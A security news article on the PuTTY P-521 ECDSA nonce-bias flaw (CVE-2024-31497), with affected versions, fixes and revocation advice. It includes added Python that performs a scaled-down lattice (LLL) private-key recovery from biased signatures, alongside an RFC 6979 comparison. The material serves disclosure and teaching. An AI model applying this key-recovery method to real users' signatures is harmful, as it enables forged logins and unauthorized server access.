Critical Vulnerability in PuTTY SSH Client Raises Concerns over Private Key Security
ICARO Media Group
In a recent advisory, the maintainers of the PuTTY Secure Shell (SSH) and Telnet client have alerted users about a critical vulnerability that could lead to the full recovery of NIST P-521 (ecdsa-sha2-nistp521) private keys. This flaw, assigned the CVE identifier CVE-2024-31497, was discovered by researchers Fabian Bäumer and Marcus Brinkmann from the Ruhr University Bochum.
The PuTTY project warns that the vulnerability allows attackers with a few dozen signed messages and the public key to extract the private key. This would enable them to forge signatures as if they were the legitimate user, potentially gaining unauthorized access to any servers using the compromised key.
Obtaining those signatures is the main obstacle for an attacker. The signatures must be ones the victim actually produced with the key, which in practice means operating or compromising an SSH server the victim authenticates to with that key (every SSH login produces one signature), or finding signatures published elsewhere, such as git commits signed with the key. This limits the exposure but does not remove it: a malicious server that the victim connects to a few dozen times has everything it needs.
Fabian Bäumer explained that the flaw originates in the generation of biased ECDSA nonces. The affected code derived each nonce from a 512-bit SHA-512 value, while the order of the P-521 group is 521 bits, so the first 9 bits of every nonce are zero. Knowing a few bits of the nonce in each signature turns private-key recovery into a hidden number problem that lattice reduction solves; Bäumer noted that state-of-the-art techniques achieve full key recovery from roughly 60 signatures.
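The recovery Bäumer describes can be reproduced at toy scale. The following Python is an added example written for this article, not PuTTY's code or the researchers' tooling: it signs with a nonce derivation that, like PuTTY's pre-0.81 scheme, is shorter than the group order, then recovers the private key from the resulting signatures. To keep the pure-Python lattice reduction to a few seconds it uses a 31-bit prime order and 12 signatures instead of P-521's 521-bit order and roughly 60; the group order, private key, messages, seed and nonce byte layout are all constructed for the example, and because the lattice step uses r only as a known scalar, the curve itself is not implemented (r is drawn at random in place of x(kG) mod n).

```python
"""Added, scaled-down illustration of CVE-2024-31497 (not PuTTY code): recover a private
key from ECDSA-style signatures whose nonces all have 9 zero top bits (hidden number
problem + textbook LLL). The group, key, messages and nonce layout are all constructed."""
import hashlib
import random
from fractions import Fraction

Q = 2**31 - 1             # toy prime group order (P-521's order is 521 bits)
BIAS_BITS = 9             # zero top bits per nonce, as PuTTY < 0.81 had on P-521
L = Q.bit_length()        # 31
B = 2 ** (L - BIAS_BITS)  # every biased nonce k satisfies 0 < k < B


def biased_nonce(d, h):
    """Pre-0.81 PuTTY style (constructed analogue, not PuTTY's byte layout): a
    deterministic hash of key and digest that is shorter than the group order.
    P-521: 512 bits of SHA-512 against a 521-bit order; here L-9 bits against L."""
    digest = hashlib.sha512(d.to_bytes(8, "big") + h.to_bytes(8, "big")).digest()
    return int.from_bytes(digest, "big") >> (512 - (L - BIAS_BITS)) or 1


def sign(d, msg, rng=random):
    """ECDSA signing equation s = k^-1 (h + r d) mod Q. The attack uses r only as a
    known scalar, so r is simulated with rng instead of computing x(kG) mod Q."""
    h = int.from_bytes(hashlib.sha256(msg).digest(), "big") % Q
    k = biased_nonce(d, h)
    r = rng.randrange(1, Q)
    s = pow(k, -1, Q) * (h + r * d) % Q
    return h, r, s


def lll(basis, delta=Fraction(99, 100)):
    """Textbook LLL on integer row vectors with exact rational Gram-Schmidt."""
    b = [list(v) for v in basis]
    n = len(b)
    dot = lambda x, y: sum(xi * yi for xi, yi in zip(x, y))

    def gram_schmidt():
        ortho, norms, mu = [], [], [[Fraction(0)] * n for _ in range(n)]
        for i in range(n):
            v = [Fraction(x) for x in b[i]]
            for j in range(i):
                mu[i][j] = dot(b[i], ortho[j]) / norms[j]
                v = [vi - mu[i][j] * oj for vi, oj in zip(v, ortho[j])]
            ortho.append(v)
            norms.append(dot(v, v))
        return mu, norms

    mu, norms = gram_schmidt()
    k = 1
    while k < n:
        for j in range(k - 1, -1, -1):            # size-reduce b_k against b_j
            q = round(mu[k][j])
            if q:
                b[k] = [x - q * y for x, y in zip(b[k], b[j])]
                for i in range(j):
                    mu[k][i] -= q * mu[j][i]
                mu[k][j] -= q
        if norms[k] >= (delta - mu[k][k - 1] ** 2) * norms[k - 1]:  # Lovasz condition
            k += 1
        else:
            b[k], b[k - 1] = b[k - 1], b[k]
            mu, norms = gram_schmidt()
            k = max(k - 1, 1)
    return b


def recover_key(sigs):
    """Hidden number problem: k_i = t_i*d + u_i mod Q with 0 < k_i < B. Signature 0
    eliminates d (k_i = a_i*k_0 + b_i mod Q); the lattice below then contains the
    short vector (k_1, ..., k_{m-1}, k_0, B), and k_0 gives back d."""
    t = [r * pow(s, -1, Q) % Q for _, r, s in sigs]
    u = [h * pow(s, -1, Q) % Q for h, _, s in sigs]
    inv_t0 = pow(t[0], -1, Q)
    a = [ti * inv_t0 % Q for ti in t[1:]]
    b = [(ui - ai * u[0]) % Q for ui, ai in zip(u[1:], a)]
    m = len(a)
    rows = [[Q if i == j else 0 for j in range(m)] + [0, 0] for i in range(m)]
    rows += [a + [1, 0], b + [0, B]]
    for v in lll(rows):
        if abs(v[-1]) != B:
            continue
        k0 = v[-2] if v[-1] == B else -v[-2]
        d = (k0 - u[0]) * inv_t0 % Q
        if all(0 < (ti * d + ui) % Q < B for ti, ui in zip(t, u)):  # bias check
            return d
    return None


def demo(num_sigs=12, seed=1):
    """Victim signs num_sigs constructed messages; the attacker recovers d from them."""
    rng = random.Random(seed)
    d = rng.randrange(1, Q)
    sigs = [sign(d, b"constructed message %d" % i, rng) for i in range(num_sigs)]
    return d, recover_key(sigs)


if __name__ == "__main__":
    print(demo())  # prints (d, recovered); the two match
```

Each signature gives the relation k_i = t_i·d + u_i (mod Q) with t_i = r_i/s_i and u_i = h_i/s_i; with the top bits of every k_i known to be zero this is the hidden number problem, and the short vector that LLL finds holds all the nonces, from which d follows. On the real 521-bit order with only 9 known bits per nonce the lattice needs the few dozen signatures the advisory mentions and a stronger reduction than this textbook LLL.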
The impact of this vulnerability extends beyond PuTTY, affecting other products that incorporate versions 0.68 through 0.80 of the software. In response to responsible disclosure, the issue has been addressed in PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3, and TortoiseGit 2.15.0.1. Users of TortoiseSVN are advised to use Plink from the latest PuTTY 0.81 release when accessing an SVN repository via SSH until a patch is available.
The fix switches PuTTY to the RFC 6979 nonce construction for all DSA and ECDSA key types. The earlier method was also deterministic, which is why PuTTY used it: hashing the private key and the message with SHA-512 and reducing the result modulo the group order yields a nonce without needing a source of high-quality randomness at signing time. For P-521, however, the group order is 521 bits, so a 512-bit hash value is never reduced and the top 9 bits of every nonce are zero; other key types are unaffected, since their group orders are far smaller than 512 bits and the reduction leaves no usable bias. RFC 6979 derives full-width candidates from an HMAC-based DRBG seeded with the private key and the message hash, and rejects any candidate outside the valid range, so its nonces carry no such bias.
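The following Python is an added example written for this article, not PuTTY's code: it puts a constructed analogue of the flawed derivation next to an implementation of RFC 6979 and measures both on a 521-bit order. The order used is the Mersenne prime 2^521 - 1, a stand-in with the same bit length as the P-521 order rather than the order itself; the flawed scheme's byte layout only mimics the effect of PuTTY's (a 512-bit hash reduced modulo a 521-bit order), and the private key and messages are constructed.

```python
"""Added example (not PuTTY code): the flawed pre-0.81 nonce derivation next to an
RFC 6979 implementation, compared on a 521-bit group order. The order used is the
Mersenne prime 2**521 - 1, a stand-in of the same bit length as P-521's order."""
import hashlib
import hmac

Q521 = 2**521 - 1  # stand-in 521-bit prime order (M521); not the actual P-521 order


def flawed_nonce(x, q, msg):
    """Pre-0.81 PuTTY-style derivation (constructed analogue, not PuTTY's exact byte
    layout): SHA-512 over the private key and the message digest, reduced mod q.
    A 512-bit hash is already below a 521-bit q, so the top 9 bits are always zero."""
    x_bytes = x.to_bytes((q.bit_length() + 7) // 8, "big")
    h1 = hashlib.sha512(msg).digest()
    return int.from_bytes(hashlib.sha512(x_bytes + h1).digest(), "big") % q


def rfc6979_nonce(x, q, msg, hashfn=hashlib.sha256):
    """Deterministic nonce per RFC 6979 section 3.2: HMAC_DRBG keyed with the private
    key x and the message hash; candidates outside [1, q-1] are rejected and retried."""
    qlen, hlen = q.bit_length(), hashfn().digest_size
    rlen = (qlen + 7) // 8  # octet length used by int2octets

    def bits2int(b):  # leftmost qlen bits of b, as an integer
        v = int.from_bytes(b, "big")
        return v >> (8 * len(b) - qlen) if 8 * len(b) > qlen else v

    def mac(key, data):
        return hmac.new(key, data, hashfn).digest()

    h1 = hashfn(msg).digest()
    # int2octets(x) || bits2octets(h1)
    seed = x.to_bytes(rlen, "big") + (bits2int(h1) % q).to_bytes(rlen, "big")
    V, K = b"\x01" * hlen, b"\x00" * hlen
    K = mac(K, V + b"\x00" + seed)
    V = mac(K, V)
    K = mac(K, V + b"\x01" + seed)
    V = mac(K, V)
    while True:
        T = b""
        while 8 * len(T) < qlen:
            V = mac(K, V)
            T += V
        k = bits2int(T)
        if 1 <= k < q:
            return k
        K = mac(K, V + b"\x00")  # candidate out of range: rekey and try again
        V = mac(K, V)


def top_bits_zero(k, q, bits=9):
    """True when the top `bits` bits of k, viewed as a q.bit_length()-bit integer, are zero."""
    return k >> (q.bit_length() - bits) == 0


def bias_report(x, q=Q521, n=64):
    """Fraction of nonces whose top 9 bits are zero under each scheme, over n constructed
    messages. The flawed scheme gives 1.0; RFC 6979 gives about 1/512."""
    msgs = [b"constructed message %d" % i for i in range(n)]
    flawed = sum(top_bits_zero(flawed_nonce(x, q, m), q) for m in msgs) / n
    fixed = sum(top_bits_zero(rfc6979_nonce(x, q, m, hashlib.sha512), q) for m in msgs) / n
    return flawed, fixed


if __name__ == "__main__":
    print(bias_report(0x1234567890ABCDEF))  # constructed private key
```

bias_report returns the fraction of nonces whose top 9 bits are zero under each scheme: every flawed nonce shows the bias, while RFC 6979 nonces show it only at the 1/512 rate expected of uniform values. The rfc6979_nonce function reproduces the test vector in RFC 6979 appendix A.1 (163-bit q, SHA-256, message "sample").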
Accordingly, any NIST P-521 key that was ever used for signing with an affected version of PuTTY, or with a product that embeds one, should be treated as compromised and revoked, even if the key was generated elsewhere, since the flaw lies in signing rather than key generation. Revocation means removing the public key from the ~/.ssh/authorized_keys file on every server it could log in to, and from the equivalent locations on other SSH servers, then generating a replacement key. Keys of other types are not affected and need not be replaced.
The PuTTY project urges all users to update to the latest version (0.81) or switch to alternative software implementations to ensure their private key security. By addressing this critical vulnerability, users can mitigate the risk of unauthorized access and maintain the integrity of their SSH connections.